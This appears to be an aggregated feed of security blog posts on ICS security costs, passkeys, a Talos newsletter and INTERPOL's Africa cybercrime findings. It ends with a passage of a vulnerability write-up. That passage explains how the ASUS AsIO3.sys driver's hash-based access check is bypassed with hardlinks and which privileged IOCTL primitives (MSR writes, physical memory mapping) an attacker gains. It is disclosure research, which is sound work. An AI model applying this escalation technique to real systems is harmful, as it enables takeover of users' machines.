When it comes to security specifically, the top issues include a lack of resources for securing ICS equipment, inadequate security measures in existing infrastructure, and difficulties with regulatory compliance.

The cost of an incident

When justifying cybersecurity budgets and planning for further development, experts unanimously recommend a risk-based approach tailored to the organization’s profile, its risk appetite, industry specifics, and other factors. The VDC Research report provides important data for this, documenting the nature and financial impact of security incidents in industrial organizations from 2023 to 2024. For example, 25% of surveyed companies that experienced security incidents with measurable financial consequences reported damages exceeding $5 million.

These costs include response efforts, direct revenue loss, and industrial-company-specific expenses like equipment repairs and losses of raw material or semi-finished goods. One of the top-three costs is unplanned downtime — a critical metric that industrial digitalization specifically aims to reduce. Most incidents resulted in downtime lasting 4–12 hours or 12–24 hours (with each range representing about a third of cases).

The cost breakdown is visualized below:
Distribution of Costs from Cybersecurity Breaches

The challenges of protecting ICS

Despite the recognized need for ICS cybersecurity and regulatory requirements, implementation remains difficult. Almost every surveyed organization faces the following challenges:

  • Limited visibility into OT networks due to numerous specialized communication protocols and incompatibility with standard IT monitoring tools
  • A shortage of specialists skilled in working with proprietary systems and industrial protocols
  • Insufficient network segmentation and the inability to isolate vulnerable equipment due to business needs; emergence of many new connections between IT and OT infrastructure
  • A growing number of IIoT devices with insecure configurations and vulnerable firmware (manufacturers often neglect security)
  • Outdated software and irregular patch releases
  • Delayed patch installation due to the need for extensive testing and coordination with operations teams regarding the installation window
  • Lack of detailed incident response plans that take into account critical events in OT networks

Some of these issues can’t be solved at the company level alone, but investing in specialized and integrated cybersecurity solutions can significantly mitigate the risks.

Specialized protection

While ICS protection projects are inherently complex, deploying specialized solutions purpose-built for OT/IT environments can increase efficiency and reduce risks. Key tools include asset and network traffic monitoring solutions (such as Kaspersky Industrial Cybersecurity for Networks) and endpoint protection solutions (such as Kaspersky Industrial Cybersecurity for Nodes). Organizations with mature cybersecurity programs use these as part of a defense-in-depth strategy — a multilayered security approach.

These solutions have features designed specifically for industrial networks, such as avoiding disruption of critical processes and communications, and operating within limited memory and processing power. Equally important is a conservative update process: this helps avoid meltdowns like the notorious CrowdStrike incident, where a faulty content update crashed the very systems it was meant to protect.

In the near future, technologies like SD-WAN and then SASE will play a bigger role by embedding security deeply into network architecture while ensuring resilience. Ultimately, the gold standard is a secure-by-design architecture, which should be built into smart industrial equipment by manufacturers at the outset.

Security implementation is a serious project — not just for the cybersecurity team but also for engineers and plant operators. As a result, project approval and rollout are often delayed. To reduce the burden on everyone involved, and also speed up the deployment of protection, companies should avoid a fragmented hodge-podge of security tools, and instead use comprehensive solutions from a single vendor. This simplifies both deployment and ongoing management through better integration. According to VDC’s survey, around 60% of organizations prefer getting all their security solutions from one provider.

How protection saves money

Despite the challenges, companies adopting specialized ICS protection solutions are already seeing clear economic benefits.

The VDC report shows that from 2023 to 2024, the number of incidents decreased in companies that deployed network and device monitoring tools. On average, incident rates dropped from 2.7 to 2.2 per year. Organizations using standard endpoint protection brought incidents down from 2.1 to 1.6. In contrast, industrial companies neglecting IT and OT protection experienced an average of 3.8 incidents — about twice as many as their better-protected competitors.

You can explore more about typical industrial digitalization projects, cyber incident damage estimates, and comprehensive protection recommendations in the full VDC report.

Kaspersky official blog – Read More

This month in security with Tony Anscombe – June 2025 edition

From Australia’s new ransomware payment disclosure rules to another record-breaking DDoS attack, June 2025 saw no shortage of interesting cybersecurity news

WeLiveSecurity – Read More

Passkey FAQ for power users | Kaspersky official blog

So far in our comprehensive guide to passkeys, we’ve covered how to ditch passwords on popular combinations of Android, iOS, macOS, and Windows smartphones and computers. This post focuses on important specific cases:

  • One-time sign-ins to your account from someone else’s device
  • Tips for frequent computer and smartphone switchers
  • Ways to secure your account when backup password sign-in is enabled
  • Potential issues when traveling internationally
  • What happens when using niche browsers and operating systems

How to use passkeys on public or shared computers?

What if you need to sign in to your passkey-protected account from a library, an airport computer, or a relative’s home? Don’t rush to remember your backup password.

Start the sign-in process on the computer: enter your username and, if prompted, click Sign in with passkey. A QR code will appear on the screen for you to scan with the smartphone that stores your passkey. Your smartphone then asks you to confirm the sign-in with your fingerprint, face, or PIN; once you do, the QR code disappears and you’re signed in to your account on the computer.

Several factors must align for this seemingly simple process to proceed smoothly:

  • The computer must support Bluetooth Low Energy (BLE), which verifies that your smartphone and the computer are indeed nearby.
  • The computer’s operating system and browser must support passkeys.
  • Both the computer and your smartphone need a reliable internet connection.

How to save passkeys to a hardware security key?

You might find using passkeys via QR codes inconvenient if you frequently access your accounts from different devices. If that’s the case, you can store your passkeys not on your computer or smartphone, but on a USB hardware security key — such as a YubiKey, Google Titan Security Key, or a similar device — for secure website sign-in. When you create a passkey, just choose to save it to your hardware key. Then you can sign in to your account from any computer or smartphone by plugging in that security token.

Just make sure it has the right combination of ports (USB-A, USB-C, Lightning) or NFC support to work with all your devices. Some token models even include a fingerprint scanner, which provides an extra layer of protection against account hijacking if the key itself is lost or stolen: without your fingerprint (or PIN), the passkeys on it can’t be used.

Unfortunately, there’s a catch: many older and popular token models can store a maximum of only 25 passkeys. Only a few advanced models — like the YubiKey with firmware version 5.7 — have raised this limit to 100.

Additionally, operating system developers view passkeys as a great opportunity to tie users more closely to their ecosystems. By default, depending on your smartphone, you’ll likely be prompted to save your passkey to either iCloud Keychain or Google Password Manager. As a result, the option to use a hardware security key might be hidden deep within the interface.

To create a passkey on a hardware token, you’ll often need to click the not-so-obvious Other options link on macOS/iOS, or Different device on Android, to select the hardware key option.

How to transfer passkeys between iOS and Android?

The biggest headache right now is if you store all your passkeys in your smartphone’s default storage and you want to switch ecosystems — moving from Android to iOS or vice versa. Currently, none of the three major OS developers — Google, Apple, or Microsoft — let you directly transfer passkeys. That’s because no one can guarantee the process will be secure. Both Apple and Google are working on implementing this feature in the future, but if you decide to swap devices today — say, from an iPhone to a Google Pixel — transferring your passkeys won’t be straightforward.

  • First, you’ll need to sign in to the account protected by a passkey on your new device. You can do this either by using your good old password (if it’s still enabled), or by scanning a QR code with your old device that has the active passkey.
  • Next, you’ll need to create and save a new passkey on your new device. Yes, you can have multiple passkeys for each website or online service.
  • Finally, if you plan to get rid of your old gadget, you’ll need to delete the old passkey from it.

To avoid this hassle, it’s best to use a third-party password and passkey manager right from the get-go. With Kaspersky Password Manager, passkey support is already available on Windows, with Android support planned for July, and iOS and macOS support — for August 2025.

How to protect an account with a passkey from being hacked using a backup password?

Most online services that offer to switch to passkeys don’t disable other sign-in methods. If your account was protected by a weak or compromised password before you switched to a passkey, cybercriminals can still bypass your shiny new passkey by simply signing in with that old password.

Creating a passkey for an account that still has a weak password is like installing a bulletproof front door while leaving the flimsy back door unlocked with the key hidden under the mat.

That’s why, before you enable passkeys for any online service, we strongly recommend changing your password as well. Since you won’t be typing this password every day — it’s just a backup for your passkey-protected account — you can really go wild with its complexity. We’re talking strong passwords that are 16 characters or longer, mixing up letters, numbers, and special characters; brute-forcing a password like that is infeasible. Ideally, generate and save that robust password in the same password manager where you’re planning to store your passkeys. Don’t rely on AI models to generate complex passwords. Our recent research revealed that while these passwords might look complex, LLMs tend to favor certain characters for no obvious reason when creating passwords, which makes their output surprisingly predictable.

Passkey drawbacks?

The underlying WebAuthn standard that powers passkeys can be implemented quite differently across browsers and operating systems. Websites often adopt these capabilities in their own unique ways. This can lead to frustrating challenges — even for tech-savvy users. Here are a few examples of this:

  • When creating passkeys, standard Windows prompts give you plenty of options for where and how to save them. By default, Windows saves passkeys in secure local storage on your computer. If you forget to select your password manager as the save location, that passkey won’t be available on your other devices.
  • Many online services like Kayak or AliExpress have dozens of regional versions, with each one being a separate website: .com, .com.tr, .co.uk, etc. A passkey is bound to the domain it was created for (its relying-party ID), so if you create a passkey for, say, your local site, and then for some reason try to access the same online service in a different region, it’s highly likely you won’t be able to sign in with that passkey: to the browser, the regional site is simply a different website.
  • Some websites don’t support creating or signing in with passkeys when using Firefox, regardless of the platform. In reality, there’s no technical incompatibility here, and simple tricks can resolve the issue, but it’s unclear why users should have to resort to these workarounds.
  • Some Apple users have reported that all their previously saved passkeys periodically disappear from their Keychain, while certain Android users can’t activate passkeys without re-flashing or factory-resetting their devices.

Any one of these situations is made worse by the fact that errors when creating or signing in with passkeys are either not mentioned at all in help documentation, or described very vaguely. It’s often completely unclear how to fix the problem. However, when passkey issues arise, websites almost always offer a backup option, such as sending a one-time access code to your email.
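The regional-site problem in the list above has a precise cause: a passkey is bound to a relying-party ID (normally the site’s domain), and a browser only offers it on pages whose host is that domain or a subdomain of it, never on a sibling domain and never for a bare public suffix such as “com” or “co.uk”. The following C function is an added example written for this page, not code from the original post; it mirrors the check a browser performs before it even looks for a credential. The public-suffix list in it is a constructed stub of a few entries, where real browsers consult the full list.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed stub of the public-suffix list (assumption for the demo);
 * browsers use the full list from publicsuffix.org. */
static const char *const PUBLIC_SUFFIXES[] = { "com", "co.uk", "com.tr", "uk", "tr" };

static bool is_public_suffix(const char *domain) {
    for (size_t i = 0; i < sizeof PUBLIC_SUFFIXES / sizeof PUBLIC_SUFFIXES[0]; i++)
        if (strcmp(domain, PUBLIC_SUFFIXES[i]) == 0) return true;
    return false;
}

/* True if rp_id equals host, or is a parent domain of host on a label
 * boundary ("kayak.com" matches "www.kayak.com" but not "mykayak.com"). */
static bool is_host_or_registrable_suffix(const char *host, const char *rp_id) {
    size_t hl = strlen(host), rl = strlen(rp_id);
    if (rl == 0 || rl > hl) return false;
    if (strcmp(host + (hl - rl), rp_id) != 0) return false;
    return hl == rl || host[hl - rl - 1] == '.';
}

/* The WebAuthn rule: the requested rpId must be the page's host itself or a
 * registrable suffix of it, and never a bare public suffix. */
bool rp_id_allowed(const char *host, const char *rp_id) {
    if (is_public_suffix(rp_id)) return false;
    return is_host_or_registrable_suffix(host, rp_id);
}

/* A passkey is usable on a page only if the page's host can claim the rpId
 * the passkey was created under.  kayak.com and kayak.co.uk are neither
 * equal nor one a suffix of the other, so the passkey is never offered. */
bool passkey_usable_on(const char *credential_rp_id, const char *page_host) {
    return rp_id_allowed(page_host, credential_rp_id);
}

int main(void) {
    struct { const char *rp; const char *host; } cases[] = {
        { "kayak.com", "www.kayak.com" },   /* same site, subdomain: offered   */
        { "kayak.com", "kayak.co.uk"   },   /* regional sibling: not offered   */
        { "kayak.com", "kayak.com.tr"  },   /* regional sibling: not offered   */
        { "com",       "www.kayak.com" },   /* public suffix as rpId: refused  */
        { "kayak.com", "mykayak.com"   },   /* not on a label boundary: refused*/
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++)
        printf("passkey for %-10s on %-15s -> %s\n", cases[i].rp, cases[i].host,
               passkey_usable_on(cases[i].rp, cases[i].host) ? "usable" : "not offered");
    return 0;
}
```

The same rule is why saving a passkey for a site’s .com domain and later visiting its .co.uk or .com.tr variant looks, from the browser’s point of view, like visiting an unrelated website; the only remedy is to create a separate passkey on each regional domain you actually use.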

Despite these challenges, a passwordless future with passkeys is on the horizon. We recommend getting ready now by creating passkeys wherever possible, saving them in your password manager, and remembering to check and update your passwords and contact information on websites to make sure you can recover access if your passkeys ever give you trouble.

Want to read more about passwords and passkeys?

Kaspersky official blog – Read More

Getting a career in cybersecurity isn’t easy, but this can help


Welcome to this week’s edition of the Threat Source newsletter. 

Happy summer, friends! I hope everyone is staying cool and/or warm. 

I am fresh back from an exhaustive but great time in San Diego at Cisco Live U.S. It was so good to see colleagues, meet new friends and pet many therapy dogs in the Splunk booth. As often happens to me, I was approached by someone who was looking for mentorship and guidance in how to get into a cybersecurity career. It’s not unusual for me to be approached by folks looking to get into cybersecurity. I’m the large, bearded guy with the Talos shirt, so I stick out.  

So, I’m often asked how I got the career I have in cybersecurity and how others can do the same. For a guy who often has a quip or answer for most things, I always pause here. I can’t help but think of my entire career and the dumb luck and hard work that landed me where I’m at. Giving that summation to others wouldn’t be fair, because… well, my journey wasn’t a linear one. I think for many of my peers, the same applies. We found cybersecurity as a career through a series of events that organically landed us in this field. In my case, more so than others, the path isn’t easy to follow because there was no clearly staked path for me to follow, either. 

I’ll explain as best I can: One today might go to school and graduate with a degree in information security and/or some security certificates, then begin the job hunt for an entry level gig. These types of degrees, certificates and even jobs simply didn’t exist in any meaningful way or numbers when I started my career. If you wanted to learn cybersecurity, there weren’t classes to take — you got a computer science degree and figured it out. I, like many in the GenX world, started as an IT professional. As the industry and cyber threats evolved, the career space over the years shifted and we found ourselves helping fight the good fight and keeping folks secure. 

Today is truly different, and I’m so happy about it and the opportunities it can give others. I’m envious of the school degrees, industry certifications and mentorship programs that exist today that did not exist for me. There is also an incredibly helpful information security community that provides hacking tutorials, or Capture the Flag competitions (CTFs) or hackathons that I would have loved to have been a part of in my formative years.  

By now, I know you’re thinking, “Cool story, grandpa, but answer the question: how do I get a job in cybersecurity?” In my estimation, the answers are as follows:  

  1. Have a good attitude. 
  2. Be easy to work with. 
  3. Be a forever student. 
  4. Be bad at giving up. 
  5. Find and join a (preferably local) security community. 
  6. Grow where you are planted. 

Notice that none of those things mention anything specifically technical. No malware reverse engineering, red teaming, threat intelligence or security analyzing. I can tell you that to work at Talos, you must exhibit strong traits of all six of those things I listed. One through five makes sense. Good hackers are tenacious, smart, work well with others and seek out fellow friends to network and hack with. 

Number six though – what’s up with that? Simply put, life deals us all a hand of cards that we must play, and those cards may not be great. For example, you want to get a job in cybersecurity, but you’re the primary caregiver of a family member and you don’t have a lot of freedom. You might be financially constrained. You may have health issues or a disability that limits some options. Or you simply just have a job that you don’t like, and a career in security calls out to you, but the bills don’t pay themselves. This is all common, and you’re a bit “stuck.”  

So while you’re stuck, find ways to grow where you’re planted. Study. Network locally or online. Try a CTF or a hacking competition. Whatever you do, just keep growing yourself, your skillset and your network. You can do it. And before you know it, you’ll have that career helping to fight the good fight with the rest of us. 

I believe in you! You got this! 

The one big thing 

Cybercriminals are increasingly exploiting Large Language Models (LLMs) by using uncensored versions, developing their own malicious LLMs or “jailbreaking” legitimate ones to bypass safety protocols. These compromised or malicious LLMs are then used to generate highly convincing phishing campaigns, create harmful code and automate various cybercrime operations, making attacks more sophisticated and scalable. 

Why do I care? 

Cybercriminals’ widespread abuse of LLMs lowers the barrier to entry for sophisticated attacks, making it easier for even less skilled actors to launch effective campaigns. This means you’re more likely to run into highly convincing phishing attempts, scams and malware that are difficult to distinguish from legitimate communications, putting your personal info and company security at higher risk. 

So now what? 

Given this evolving threat landscape, it’s important to be extra vigilant and skeptical online. Treat all online communications with caution, even if they look perfectly authentic. For individuals, that means double-checking emails and messages for anything fishy, no matter how well-written they seem. For businesses, it’s time to beef up your cybersecurity defenses, invest in smart threat detection and keep your employees sharp on how to spot and report these increasingly clever social engineering tricks.

Top security headlines of the week 

New AI Jailbreak Bypasses Guardrails With Ease 
On topic with our latest blog, the new “Echo Chamber” attack bypasses advanced LLM safeguards by subtly manipulating conversational context, proving highly effective across leading AI models. (SecurityWeek)

US insurance giant Aflac says customers’ personal data stolen during cyberattack 
Aflac says hackers stole an unknown quantity of its customers’ personal information from its network during a cyberattack earlier this month. (TechCrunch)

APT28 Uses Signal Chat to Deploy New Malware in Ukraine  
A new cyberattack campaign by the Russia-linked APT28 (aka UAC-0001) threat actors uses Signal chat messages to deliver two new malware families dubbed BEARDSHELL and COVENANT. (The Hacker News)

UK watchdog fines 23andMe over 2023 data breach 
The U.K. data protection watchdog has fined 23andMe £2.31 million ($3.1 million) for failing to protect U.K. residents’ personal and genetic data prior to its 2023 data breach. (TechCrunch)

Can’t get enough Talos? 

Decrement by one to rule them all: AsIO3.sys driver exploitation 
Learn how our researcher, Marcin Noga, found two critical vulnerabilities in ASUS’ Armory Crate and AI Suite drivers. 

Talos Takes: Teaching LLMs to spot malicious PowerShell scripts 
Hazel chats with Ryan Fetterman from the SURGe team to explore his new research on how LLMs can assist security operations centers in identifying malicious PowerShell scripts.

Leveraging Detections from the Splunk Threat Research Team & Cisco Talos
Wednesday, July 23
11:00 a.m. to 12:00 p.m. PDT
Join us for a discussion around the latest security detections developed for the SOC and how to find and remediate threats, faster.

Upcoming events where you can find Talos 

  • REcon (June 27 – 29) Montreal, Canada 
  • NIRMA (July 28 – 30) St. Augustine, FL 
  • Black Hat USA (Aug. 2 – 7) Las Vegas, NV  

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507 
MD5: 2915b3f8b703eb744fc54c81f4a9c67f 
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
Typical Filename: VID001.exe 
Claimed Product: N/A 
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: 05883fccb64dd4357c229ccca669afdacbfa0bc9a1c8d857f5205aed0a81e00a 
MD5: 71b973dbdfc7b52ae10afa4d0ad2b78f 
VirusTotal: https://www.virustotal.com/gui/file/05883fccb64dd4357c229ccca669afdacbfa0bc9a1c8d857f5205aed0a81e00a/details 
Typical Filename: PCAppStore.exe 
Claimed Product: PC App Store 
Detection Name: Riskware/VeryFast 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91   
MD5: 7bdbd180c081fa63ca94f9c22c457376   
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details
Typical Filename: IMG001.exe  
Claimed Product: N/A 
Detection Name: Simple_Custom_Detection   

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0 
MD5: 8c69830a50fb85d8a794fa46643493b2  
VirusTotal: https://www.virustotal.com/gui/file/c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0/details  
Typical Filename: AAct.exe  
Claimed Product: N/A  
Detection Name: PUA.Win.Dropper.Generic::1201 

SHA 256: 2a753cdc8c5401dcb67f3be58751a32ce23c875f8720a70459533b30e5ba4f1f 
MD5: 7d5a9a41157fb0002f5234b4512e0ac2 
VirusTotal: https://www.virustotal.com/gui/file/2a753cdc8c5401dcb67f3be58751a32ce23c875f8720a70459533b30e5ba4f1f/details 
Typical Filename: pros.exe 
Claimed Product: N/A 
Detection Name: Trojan.GenericKD.76128711 

Cisco Talos Blog – Read More

How to survive digitalization | Kaspersky official blog

Digitalization of business – especially in the small and medium-sized segment – allows for quick upscaling, better customer service, and entry into new markets. On the downside, digitalization amplifies the damage caused by a cyberattack, and complicates the recovery process. Given that company resources are always limited, which attacks should be deflected first?

To answer this question, we studied the INTERPOL Africa Cyberthreat Assessment Report 2025. The document is useful because it collates police cybercrime statistics and data from information security companies – including Kaspersky – allowing us to compare the number and types of attacks with the actual damage they caused. This data can be used to build a company’s information security strategy.

Average ranking of cybercrime types by reported financial impact across African subregions, based on INTERPOL member country data.

Targeted online fraud

Fraudulent operations were the clear leader in terms of damage caused across the continent. They’re gaining momentum in line with the rising popularity of mobile banking, digital commerce, and social media. In addition to mass phishing aimed at personal and payment data theft, targeted attacks are growing at a rapid rate. Scammers are grooming potential victims in messenger apps for months, building trust and guiding them into a money extortion scheme – for example, a fake cryptocurrency investment. Such schemes often exploit romantic relationships and are therefore called romance scams, but there are other variations. In Nigeria and Ivory Coast, for example, scammers were arrested for attacking small media platforms and advertising agencies. Posing as advertisers, they stole almost 1.5 million U.S. dollars from victims.

The fact that 93% of Africans use plain old WhatsApp rather than corporate communication tools for work significantly boosts the success rate of attacks on employees and company owners.

Ransomware incidents

Press headlines may give the impression that ransomware operators mainly target large organizations, but the statistics in the report debunk this theory – showing that both the number of attacks and the actual financial damage caused are significant across all business segments. What’s more, there’s a direct link between the level of digitalization and the number of attacks. So, if a company observes an overall increase in “digitized” business activity in its market segment, the threat level is sure to rise accordingly. In Africa, “affiliates” of the largest and most dangerous ransomware-as-a-service platforms – such as LockBit and Hunters International – are responsible for major incidents on a national scale.

Among the main ransomware incidents in Africa – hardly known about outside the continent – we highlight the following: the theft of $7 million from Nigerian fintech company Flutterwave; attacks on Cameroonian electricity supplier ENEO; a large-scale ransomware attack to exfiltrate data from Telecom Namibia; and the targeting of South Africa’s National Health Laboratory Service (NHLS), which led to canceled operations and the loss of millions of lab test results.

Banking Trojans and infostealers

Although the direct losses from banking Trojans and infostealers fell outside the top-three in terms of damage, it’s the “successes” of this criminal industry that have a direct impact on the number and severity of other attacks – primarily ransomware and business email compromise (BEC). After stealing what credentials they can from thousands of users with infostealers, attackers filter and group them by various criteria, then sell curated sets of accounts on the illicit market. This allows other criminals to buy passwords to infiltrate organizations of interest to them.

Business email compromise

For small and medium businesses mainly using public services like Gmail or Office 365, infection with an infostealer gives attackers full access to corporate correspondence and business operations. The attackers can then exploit this to trick customers and counterparties into paying for goods and services to a fraudulent account. BEC attacks have a firm hold at the top of the damage charts, and small businesses can fall victim to them in two ways. First, cybercriminals can extract money from larger clients or partners by impersonating the compromised small business. Second, it’s easier with a small business to persuade the owner or accountant to transfer money than it is with a large organization.

There are several large criminal syndicates based in Africa that are responsible for international BEC operations causing multi-billion-dollar damage. Their targets also include African organizations — primarily those in the financial and international trade sectors.

How to protect business from cyberthreats

To effectively counter digital threats, law enforcement agencies need to share data with commercial information security companies that harness telemetry to identify threat distribution hotspots. Recent successes of such partnerships include operations Serengeti (1000 arrests, 134 000 malicious online resources disabled), Red Card (300 arrests), and Secure (32 arrests, 20 000 malicious resources disabled). These operations, conducted under the auspices of INTERPOL, used cyberthreat intelligence received from partners – including Kaspersky.

But businesses can’t leave cybersecurity solely to the police; they need to implement simple but effective security measures of their own:

  • Enable multi-factor authentication (MFA), phishing-resistant where the service supports it, for all online accounts: Google, Microsoft, WhatsApp, etc.
  • Install reliable anti-malware protection on all corporate and personal devices. For corporate devices, centralized security management is recommended – as implemented, for example, in Kaspersky Endpoint Detection and Response.
  • Hold regular cybersecurity training – for example, using our Kaspersky Automated Security Awareness platform. This will reduce the risk of your company falling victim to BEC and phishing. All employees, including management, should participate in training regularly.
  • Back up all company data on a regular basis and in such a way that the backups can’t be destroyed during an attack. This means backing up data either to media that are physically disconnected from the network, or to cloud storage where a policy prohibits data deletion.

Kaspersky official blog – Read More

Decrement by one to rule them all: AsIO3.sys driver exploitation

Introduction


Armory Crate and AI Suite are applications used to manage and monitor ASUS motherboards and related components such as the processor, RAM or the increasingly popular RGB lighting. These types of applications often install drivers in the system, which are necessary for direct communication with hardware to configure settings or retrieve critical parameters such as CPU temperature, fan speeds and firmware updates.

Therefore, it is critical that such drivers are written with security in mind and designed so that access to their interfaces is limited to specific services and administrators.

Figure 1. Armory Crate application.

During the audit of the code and components related to the aforementioned applications, Cisco Talos discovered two critical vulnerabilities in the AsIO3.sys driver. Both vulnerabilities were discovered in the IRP_MJ_CREATE handler:

The first vulnerability is a stack-based buffer overflow that occurs during the process’s ImagePath conversion from “Win32 Path” to “NT Namespace Path”.

The second vulnerability allowed bypassing the authorization mechanism implemented in the driver, granting access to its functionality not just to the intended service but to any user. With access to a security-critical function within this driver, I successfully developed a fully working exploit that escalates local user privileges to “NT SYSTEM”, which we describe in detail below.

Please keep in mind that I discovered this exploit before the Windows 11 24H2 update arrived. This update prevents regular users from leaking information such as loaded kernel modules and their addresses via “NtQuerySystemInformation.” This is discussed in further detail below.

Recon phase

While looking for drivers installed alongside the Armory Crate software, I noticed two related to ASUS in the DriverView list.

Figure 2. Screenshot presenting driver entries belonging to ASUSTek Computer Inc.

Focusing on AsIO3.sys, I investigated whether this driver creates any devices and, most importantly, whether a regular user can communicate with such a device.

Obtaining a handle to the Asusgio3

Using DeviceTree, we can see the following encouraging picture:

Figure 3. DeviceTree incorrectly displays that the group “everyone” has full access to the Asusgio3 device.

The AsIO3.sys driver creates the Asusgio3 device, which nearly everyone in the system apparently has full access to. After a quick check with simple code that attempts to open a handle to the device, I got the error code “5 == ERROR_ACCESS_DENIED”.

Figure 4. Part of PoC code responsible for opening a handle to the Asusgio3 device.

This was unexpected based on the DeviceTree interface, so I re-checked the privileges to that device using Sysinternals “accesschk” and got completely opposite results.

Figure 5. Checking permissions for Asusgio3 with “accesschk”.

Which is the truth? To find out, I reversed fragments in the AsIO3 driver responsible for handling the “IRP_MJ_CREATE” request.

Analyzing “IRP_MJ_CREATE” handler

By loading the driver and beginning the reversing process, we see a single function handles IRP requests for three different request types.

Figure 6. Driver initialization routine where IRP request handlers are assigned to DriverObject.

Diving into “callback_irp_dispatch”, I found a fragment responsible for handling the “IRP CREATE” request:

Figure 7. Part of “callback_irp_dispatch” function code. Functions’ names have been added by the author.

Authorization mechanism 

Checking the “ImageHashCheck” function, we can see the following:

Figure 8. ImageHashCheck function body.

Using the API “ZwQueryInformationProcess” with the flag “ProcessImageFileNameWin32” (lines 8 and 19), ASUS developers attempt to obtain the image path (the path to the executable file) of the current process — specifically, the process that is trying to obtain a handle to the device.  

Next, in line 26, we see the translation of the path from the “Win32 File Namespace” to the “NT Namespace”. Hold tight — we will return to this line in a moment.

In lines 35-46, there is a typical SHA256 hash calculation for the current process’s executable file. In line 47, the calculated hash is compared with a hardcoded hash in the driver, and if they match, the function returns “true”, allowing the process to obtain a handle to the device.

When we dump the hash from the global variable “g_sha256Hash” (visible on line 47), it appears as follows:

```python
Python>binascii.b2a_hex(idc.get_bytes(0x0000000140009150,32))
b'c5c176fc0cbf4cc4e37c84b6237392b8bea58dbccf5fbbc902819dfc72ca9efa'
```

I calculated the SHA256 hash for “AsusCertService.exe” and saw that it was the same hash:

```powershell
PS C:\Users\icewall> Get-FileHash -Path "C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe" -Algorithm SHA256

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          C5C176FC0CBF4CC4E37C84B6237392B8BEA58DBCCF5FBBC902819DFC72CA9EFA       C:\Program Files (x86)\ASUS\AsusCertService\AsusCertService.exe
```

With this new understanding, only the “AsusCertService.exe” service and processes whose PIDs are added by it to the allowed list can obtain a handle to the Asusgio3 device. Otherwise, the operation returns the status “Access is denied.”

Win32PathToNtPath – stack based buffer overflow

This article will not spend much time on the vulnerability discovered in the “Win32PathToNtPath” function, as it will not be used in the later stages of exploitation. However, it is interesting enough to mention.

The developers assumed that a Windows path can be at most roughly “MAX_PATH” (260) characters long. Based on this assumption, they copy the received image path into a fixed-size 255-character buffer on the stack without first checking the actual length of the path. The assumption is incorrect: a path can exceed ~260 characters. As Microsoft documents here, “The maximum path of 32,767 characters is approximate, because the “\\?\” prefix may be expanded to a longer string by the system at run time, and this expansion applies to the total length.”

For more information about this vulnerability, read this advisory: CVE-2025-1533/TALOS-2025-2144 – Asus Armoury Crate AsIO3.sys stack-based buffer overflow vulnerability

Authorization bypass

Knowing that the authorization mechanism is based on the “ImagePath” returned by the “ZwQueryInformationProcess” API and the SHA256 hash calculated for the executable file at this path, we can start considering potential bypasses.

By examining the implementation of “(Nt/Zw)QueryInformationProcess” in the “Windows Research Kernel (WRK)”, I learned that the information about the current process’s “ImagePath” is retrieved from the “EPROCESS” structure. Therefore, there is no chance to manipulate its value from User-Mode, but there are still options for potential bypass. 

Hardlinks to the rescue

Using a hardlink, we can bypass the “ImageHashCheck” routine. First, we create a hardlink to the PoC.exe file.

Figure 9. Creation of a hard link pointing to “PoC.exe”.

The “PoC.exe” won’t do much for now — it will simply wait for user input before attempting to open a handle to the Asusgio3 device.

Figure 10. Image presenting part of the PoC.exe file responsible for opening a handle to the Asusgio3 device.

Instead of running our “PoC.exe” directly, we execute the “run.exe” hard link. As a result, the ImagePath in the EPROCESS structure points to the hard link.

While the run.exe (PoC.exe) is executed and waiting for user input, we then delete the hardlink and create a new one with the same name, but pointing to AsusCertService.exe. However, trying to create a direct hard link to the original AsusCertService.exe location returns the following:

Figure 11. Due to implemented mitigations, the attempt to create a hardlink to the direct location of AsusCertService.exe failed.

Because of mitigations Microsoft introduced years ago, a user can only create a hard link to a file that they have permission to overwrite. This is not a problem in this case, as I can simply copy the file to a temporary location and then create a hard link.

Figure 12. Successful attempt to create a hardlink to the local copy of AsusCertService.exe.

Now I can let the previously started PoC.exe process continue. At the moment PoC.exe attempts to open a handle to the Asusgio3 device, the run.exe hard link points to the copy of AsusCertService.exe, so the SHA256 hash matches and the authorization mechanism is bypassed. The check is a classic time-of-check/time-of-use flaw: it hashes whatever file the image path resolves to at check time, not the image that is actually executing.

Finding strong exploitation primitives

Analyzing the driver’s functionality

Browsing through the code of the AsIO3.sys driver’s IOCTL handlers, I came across the following functionality, which provides good primitives for exploit development. As a regular user, I could perform the following actions (among others) using the appropriate IOCTLs:

  • Read/write to Model-specific registers (MSR)
  • Map arbitrary physical memory [address,size] into our process virtual memory
  • Read/write I/O ports

However, the exploitation turned out to be more challenging than this originally indicated.

Exploitation attempt with MSR modification

There are at least two crucial MSR registers from a security perspective:

  • IA32_LSTAR (0xC0000082) 
  • IA32_SYSENTER_EIP (0x00000176)

These MSR registers define the addresses in the kernel where execution is redirected when the SYSCALL or SYSENTER instructions are triggered. By modifying these registers, we can potentially hijack control flow and execute arbitrary code with privileged access, making them an important vector in kernel exploitation. I found a promising-looking handler for IOCTL 0xA040A45C, which allows overwriting the MSR register with arbitrary data.

Figure 13. IOCTL handler providing a limited way to modify MSR registers.

In line 16, the “__writemsr” intrinsic is called with data we control from the “SystemBuffer” (line 8) as both the MSR register index (“msrReg”) and the value to write (“msrRegVal”).

At first glance, this looks promising; however, there is a call in line 11 that checks the “msrReg” value (index). Take a closer look:

Figure 14. MSR filtering function, allowing modification of only a limited set of MSR registers.

